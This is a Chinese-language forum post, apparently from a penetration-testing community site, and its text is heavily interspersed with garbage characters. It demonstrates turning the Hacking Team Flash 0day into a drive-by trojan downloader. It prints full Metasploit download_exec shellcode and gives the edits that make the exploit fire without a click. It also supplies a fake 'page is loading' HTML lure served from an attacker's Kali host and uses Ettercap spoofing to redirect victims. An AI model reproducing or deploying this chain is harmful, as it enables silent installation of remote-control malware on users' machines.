三、flash 0day之手工代码修改制作下载者实例入侵演示 * `+ t/ ^% [0 Z; t% ?) ~5 R
利用到的工具: 5 Y) `' m+ v9 ~, j0 Y/ r
6 n* G* n9 i0 iMsf 1 |# p* N0 h8 w; E5 Y" O
0 W( h6 r4 S# J# Q [ Ettercap ! ~# V+ Z& `0 e& z5 z( O- x% y
Adobe Flash CS6
* t- u4 x3 g+ P6 E% [ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 p- E% H, T/ V+ U( H& n& n3 e5 w
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options , }' O- N0 A1 ^. e- P' F
" w* s" K/ u# U4 a+ T 如图: # X) @& i! B7 f
% ]5 \) R' |* e/ @3 F& }: k3 g5 y+ V5 r& m* P* F( I
2 Y& O/ c, R' d8 p' C/ R! L @6 p+ ?. u& U! z0 G x, t# `
8 f/ i; \, c7 ]
: F4 g: K' k7 x6 d9 {1 a 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + {4 ]) d( c! Y w" U
% C0 p- B6 R2 h
& K1 n: `7 d! a# I2 T6 ~& {* T0 O
4 u4 N: @& q+ F: @: Y. n9 Y5 B+ V+ f, x 然后执行generate -t dword生成shellcode,如下: 5 ]5 ^# \6 u: W. x2 {
4 w9 O# U( o( i( T( l( s) ^- a
8 o5 o5 S8 A' Z4 ^ 复制代码到文本下便于我们一会编辑flash exp,如下: , X w' _0 s5 u0 n/ s6 w1 @+ e
! {( s7 a2 ^1 a1 H0 s0 P) D5 `. c: R. q- W' r2 J 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
6 m$ L% M& a2 A6 k X/ u6 q 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 5 [( J) `* n! C K2 v
2 O: z) k0 L, D( u7 H1 \. u# }0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, , N s) y2 v6 b8 P- B) g; ?) ?
5 U" J1 y: p3 ^0 G6 A0 A+ ` 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
- T8 @+ p4 A. l/ q# G* L 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
4 r+ Z' }; G; W: u( |0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, - u, c: `7 ^8 ?7 G; }
' V) A ?; c6 {3 q% U0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 0 W! z6 S& N0 m; Y3 U
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
# Q8 }: S# d) G0 H) f$ P0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ! {) B) E: H, O8 m7 k
. V, @0 ^5 Z: u0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 5 r$ w2 l8 i( u1 g5 N1 v
1 R- ] m6 D% I6 M) S3 Y8 Q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, " S2 Z4 E; S. s8 f
2 \' D* e' u. q: u) ^9 r0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ( r7 j& L+ S: ]; H* T2 ~( N
' |. w7 M' t- |5 d! V8 J0 w" W! e; ] % r6 U6 {$ j8 r) H; L |& K
& v# q2 e( P: T7 I% R , w8 k/ Y6 R( e9 G+ @5 N5 j2 \4 Y8 u
9 u5 v* C( P; d/ ]/ Z. }( ] m) X# q6 m+ h- D$ |# s, I8 v 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
. l% n5 `, _4 G0 S" r, C& c+ c' O; n; X3 n0 _; b/ H0 m# h! j3 x! w* ~2 C5 q
+ _: L- E$ L' b3 t1 f8 [5 H 先修改ShellWin32.as,部分源代码如图: " s) Z4 {1 e0 e" M* r* h5 ^7 N
) g! n, ]- u$ [6 R% T& c
& C: x" ^5 f4 L, x- o
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 6 T+ _1 J# F; K& V4 m2 W( h
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - k; j& X# A- {% ` S) L
# w0 F9 j4 B! f
. D* N6 D- w% d% V) C' f
1 @# \& r2 l: g$ P5 Y7 Q 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 0 Z! o7 G) s1 j& b$ |& V
+ q0 V! U/ c& c0 y/ _1 G ?; B# _6 Z
3 q0 d& N7 Z; t" k" _" J8 V 6 v# O! f( C8 s' r
4 Y/ L1 y/ b3 r. t2 y/ B
4 u5 T; R: h6 ^2 @
3 m0 Y" J. w- j4 \% d* Z 然后点保存,下面我们来编译一下,打开
" S" m8 x( u/ `! Y exp1.fla然后点文件-发布,看看编译没错误 . |9 K6 M0 i3 J" n+ ^& T
8 r/ [7 o! `3 I9 e ; W* f" m. o& P/ S' S
9 b* W/ S/ J* p/ n( b! B$ f q* Z. F
! |0 o' z' |2 O0 j0 r : G6 G( f2 a# n6 o+ P. _
* [8 B" T4 @- O
" W4 y8 q* e5 ^/ |! E$ {
! w. m# H5 z% J- p 然后我们把生成的 7 z& L; L+ s! Y0 _/ l
3 ~% m9 z; L, o& C3 X, O" Z( w/ R# Q. U exp1.swf丢到kailinux 的/var/www/html下: * q) ^) n& j H7 s
5 b+ c5 S+ f2 F, u! O3 d8 w$ C, a 然后把这段代码好好编辑一下
/ S; x2 v$ w; L5 _! C 4 ^/ U* F$ c6 n p" s! b
5 C) A$ w3 @9 Z, t0 [8 h. d3 e, D. b8 R! Y6 W' A; Q" N 5 w/ [: I& D7 Y6 ^. r) x
% D k+ [: D& M' j* Y0 c# J: a! M. B% {( r' ^" v, d
( [, w1 l% G$ `- E L7 m3 C# G) |" F1 F
0 X" e- O; e0 B$ q( x, r) u( e& N( E, A2 ]! k% W
( f4 [2 _; e4 U1 G& e
<!DOCTYPE html> 5 W h5 n; j6 B& v0 c' u8 `. d- ^ Q
+ [5 y) g7 h$ I: W" k/ d3 t5 B* q0 T Y9 C# r. j <html> ; p! g' i( v6 L2 L2 h, ~* J
& |$ ^3 n+ o! t0 p+ J& j! P' y$ q% z <head> 0 s8 _) M! k' O: a
<meta http-equiv="Content-Type" content="text/html; $ a& }. u* r& Z4 E
" R; F8 F# W6 i5 [1 P" i charset=utf-8"/> + c# d) J( P: Q, N7 g. D( ]; M
</head> ! v/ Y9 l: }: u7 b6 l0 i U
( v7 ^5 Q9 d; |* J& N& d+ W, ^ <body>
<h2> Please wait, the requested page is loading...</h2> 6 ^) e" d8 t8 m" q; i: i( {
# x( S" p8 }$ @! E! O( A+ E7 C( L+ Z! P <br> : B1 A* E6 ?9 Z+ k) A3 F
<OBJECT
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie
, r. i' h5 O+ t3 _/ Q% T8 H VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
3 {3 j6 s3 r' X. P: M; L</body>
<script>
setTimeout(function () { + Q) |- k+ O! _; c' C0 U$ v' v+ j
! C# v2 V y3 Q' z( |, K2 L8 {9 J) z+ Z( n3 s2 r
* y4 M( m! W9 j1 Swindow.location.reload();
/ O0 y w6 }* D$ f! d$ ^7 j8 q, S: y }, 10000); 1 F6 u# Q( J/ O% e
/ @5 Q/ c$ u7 K( U' _
</script>
' c5 D3 k; [+ e1 ?9 Y. U$ L3 D$ g( R, b </html>
}6 f7 e* A" i% U8 y7 Y, r; N2 F: r- E) V+ j/ i- o
% j$ G5 ?( \: q6 h6 h注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
1 e8 V/ T% V0 r \
( k: H. Q* n& v' }. n, G& ^ & ^" c* H0 J- S; {; A/ d5 Z9 x
2 T5 ~6 E- f" u+ ?4 [ n
' H+ c1 G6 _4 U/ V; N# Q
1 D/ D, N; p0 K! ^+ S 3 r2 B ?, ?4 a3 Z2 h. A! U% p4 h
下面我们用ettercap欺骗如图:
6 n8 G5 ?- X& n( x; ~) M4 x
* }+ Z" a( j* B4 M
c1 F9 w! x1 e9 Q+ Y d8 t* I
" w4 E3 D: `4 o3 R9 f5 v U4 W: U( q" u9 l" }0 u, J 下面我们随便访问个网站看看:
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
1 i7 }. @: [7 X& ~4 ^0 o( W; L+ c$ u2 N5 X5 Z
7 B( K9 {* [/ L0 Q' ^7 E' p; B
' E; f c; z2 a+ d 我们看另一台,
3 T1 V, j; R5 x: d: c: _4 y8 N0 q% q: S7 M
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 0 ~& V7 C3 N- f1 z; L+ t- `+ ~2 V9 [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |